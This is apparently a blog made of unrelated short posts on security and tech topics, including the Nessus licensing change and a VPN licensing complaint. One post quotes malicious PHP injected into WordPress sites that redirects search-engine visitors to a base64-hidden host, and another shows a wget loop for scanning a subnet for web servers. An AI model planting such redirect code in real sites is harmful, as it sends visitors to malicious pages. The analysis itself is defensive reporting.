I suppose it is inevitable that once a marketplace gains a certain amount of traction scammers will follow. I have listed a PSP on my facebook account for a while now and I just had a really exciting offer made. For the mother of a teenager she is in remarkably good shape.
Found this great little commentary while researching the write() method in REXML:
ie_hack: Internet Explorer is the worst piece of crap to have ever been written, with the possible exception of Windows itself. Since IE is unable to parse proper XML, we have to provide a hack to generate XML that IE‘s limited abilities can handle. This hack inserts a space before the /> on empty tags. Defaults to false
Thanks to co-author Brandon Palmen for the heads up to a Wordpress hack in progress. The attackers are using a few obfuscation tricks to inject code into Wordpress installations using a recently announced vulnerability. More details in a well written write up here.
The code snippets from a digitalpoint.com forum are shown using base64 encoding to hide the true destination:
<php>
$seref=array("google","msn",
"live","altavista","ask",
"yahoo","aol","cnn",
"weather","alexa");
$ser=0;
foreach($seref as $ref)
if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false)
{ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0)
{
header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
exit;
}
></php>
This code shows yet another trend we’ve noticed at stopbadware.org of only exploiting those requests which come directly from a search engine. We can only conclude this is to prevent (or delay) detection and maximize infection duration.
Peter Suber has written a great post that should be read by anyone interested in education, open source, or what is known as Open Access. In my younger days I listened to the mantra of hacker lore, “Information wants to be free” and so the ideals of Open Access are quite appealing. This mantra seems to have mutated for me and today I personally believe that “Knowledge wants to be free”. Peter points out that, “In the age of print, publishers could control access to research they did not conduct, write up, sponsor or purchase. One reason is that publishers controlled all the effective channels of distribution; but that has changed.”
Will be held at Middlesex Lounge in Central Square, Cambridge MA on June 18th, 2008. The Enormous Room is all booked up and so we are going to be at our backup location. We are considering making this a permanent move so come check it out.
Disturbing news of a hacked blogger in China. This is not a simple DBD setup involving iframes. This was a highly targeted and politically motivated attack. The attackers not only posted a personal picture of her with instructions for viewers to assault her on the street but managed to infiltrate her Skype account.
Dear Nessus Community,
On behalf of Tenable Network Security, we would like to thank you for making Tenable’s Nessus®
vulnerability scanner the most widely used scanner in the world. Over the last five years, we have seen
Nessus grow globally to over 5 million downloads and we have been there every step of the way. The core
Nessus engine is powered by our world-class vulnerability research content which includes over 20,000
plugins, enhanced features such as IPv6 scanning, free mailing lists, online search tools and free clients.
Nessus has become not only a popular tool for conducting security audits but we have extended its
capabilities to conduct agent-less patch audits and configuration audits, as well as locating sensitive data.
Looking forward, we plan to further increase functionality, such as SMBv2 support to better audit Windows
2008 and Windows Vista, and further expand our abilities to conduct even more comprehensive vulnerability
and configuration audits.
In the process, the Nessus scanning engine has been provided to our rapidly growing community as a free
download with research content licensed through two plugin subscriptions. Our Nessus users know these as
the “Registered Feed” and the “Direct Feed” subscriptions. These subscriptions have been available for over
three years and have been utilized by countless individuals, consultants, companies, governments and other
organizations.
We continually interact with the Nessus community and review our capabilities to ensure Nessus continues
to meet and exceed the needs of its users. Since creating and releasing the subscriptions, two distinct user
groups emerged. They are the home user and the commercial user. To better reflect the needs our
community, we have decided to update our Subscription licensing policy and are announcing the planned
change (as outlined below and accompanied by a FAQ) that will go into effect on July 31st, 2008.
First, we will continue to enable all users to download Nessus for free.
Second, due to computers and personal networks having become ubiquitous in homes around the
world, Tenable will launch a “HomeFeed” with all Nessus vulnerability plugin updates for home users
at no charge and with no delay. We are excited to offer the latest vulnerability checks for
personal, non-commercial use and strongly encourage home users to audit their computers and
networks for the newest security flaws.
Finally, Tenable’s “Direct Feed” will be re-named to the “ProfessionalFeed” and the “Registered Feed”
will be discontinued. The ProfessionalFeed will entitle subscribers to the latest vulnerability and
patch audits, configuration and content audits and commercial support for their Nessus 3
installation. The ProfessionalFeed will serve as Tenable’s commercial subscription and will be
required for individuals and organizations that want to use Tenable’s Nessus plugins commercially.
The decision to alter the licensing policy is the result of significant deliberation and will benefit both home
users and commercial users. The change will ensure our ability to invest in the future roadmap for Nessus
and to expand our research, support and training capabilities to serve our growing community. We realize
this may affect some individuals, corporations and organizations that use the currently available “Registered
Feed” in production audits and commercial services. Because of this, Tenable is offering a 25 percent rebate
for the Direct Feed subscription service (normally available at $1200 per year), beginning May 14, 2008 until
July 31, 2008 only when purchased through Tenable’s e-commerce site.
Additionally, we understand that there are those in the Nessus community that serve broad social and
educational objectives and we want to make certain that qualified charitable and information security
teaching/training organizations have access to the ProfessionalFeed free of charge. To this end, Tenable will
provide ProfessionalFeed subscriptions to charity and teaching/training organizations at no cost for those
that qualify.
As always, Tenable will continue to perform the in-depth research, testing and development to keep Nessus
the leading vulnerability and network auditing tool available to both home and professional users.
excerpt directly from Tenable Network Security, Inc.
ERROR: Your architecture, \’ppc\’, is not supported by the
Adobe Flash Player installer.
I use a professional VPN software on my Powerbook called VPN Tracker from equinux. I bought this software because I wanted a streamlined and pushbutton system for dealing with the ISAKMP VPN at work. Normally this software works quite well but because of the aging hardware in my Powerbook I’m suddenly without any access to my internal network.
Several bits of my laptop are broken and I had to bring my powerbook to the repair center. Before I turned in my laptop I created a mirror of the drive using rsync. OS X lets a user boot from a firewire drive and so with a “loaner” powerbook from work I have a complete, albeit slow, clone of my original laptop. thunderbird, firefox, etc all work the same and are configured exactly as they were. VPN Tracker unfortunately is not. the configuration is still intact however the software doesn’t think it is licensed anymore. I imagine that this is due to some check made on my CPU, drive volume, etc to verify that I’m not installing this on multiple computers or something similar. More interestingly I can’t get to my email server anymore because our work place is very paranoid and requires vpn authentication for access.
I understand the need for software protection in this marketplace but at this time I can say that it has utterly failed me as an end user. Despite supporting the company with a purchase all I can do now is sit and wait for an answer to my email. I only hope they respond to the alternate address I provided them.
I was looking for a novel way to recon a network for webservers and came up with a command line combination involving wget and find. The first stage is to use wget and download the index page of any server that responds. The second stage is to remove all the zero length files that will be written for non responsive but active IP addresses.
WGET STAGE
If you are assigned to scout a network range from 192.168.1.1 - 192.168.1.255 you can use a for loop and wget to quickly download index pages. Obviously this technique could be adapted for larger ranges but in this published form is best for Class C only.
for i in `seq 1 255`
do
wget -O 192.168.1.$i.html 192.168.1.$i &
done
Expanding the parameters of the wget command we see that -O is used to write an ouput file with a specific name. Otherwise we will have filename collisions all over the place and more importantly we will have no idea what the originating server is. The & is used to put the process into the background and acts as a cheap form of parallel tasking. All of the requests will launch at the same time. Since we are limiting ourselves to a class C we won’t worry about overloading the machine.
ZERO LENGTH FILE STAGE
The resulting files will either have html in them or have a zero length. The zero length files will occur when the ip address is alive but there is no web server there to respond. To clean these we use a clever technique for discovering these files using the find command.
for i in `find . -empty -exec ls {} \;`
do
rm $i
done
What is left is html code saved with a fliename of the ip address where it was found.
Global Voices China Feed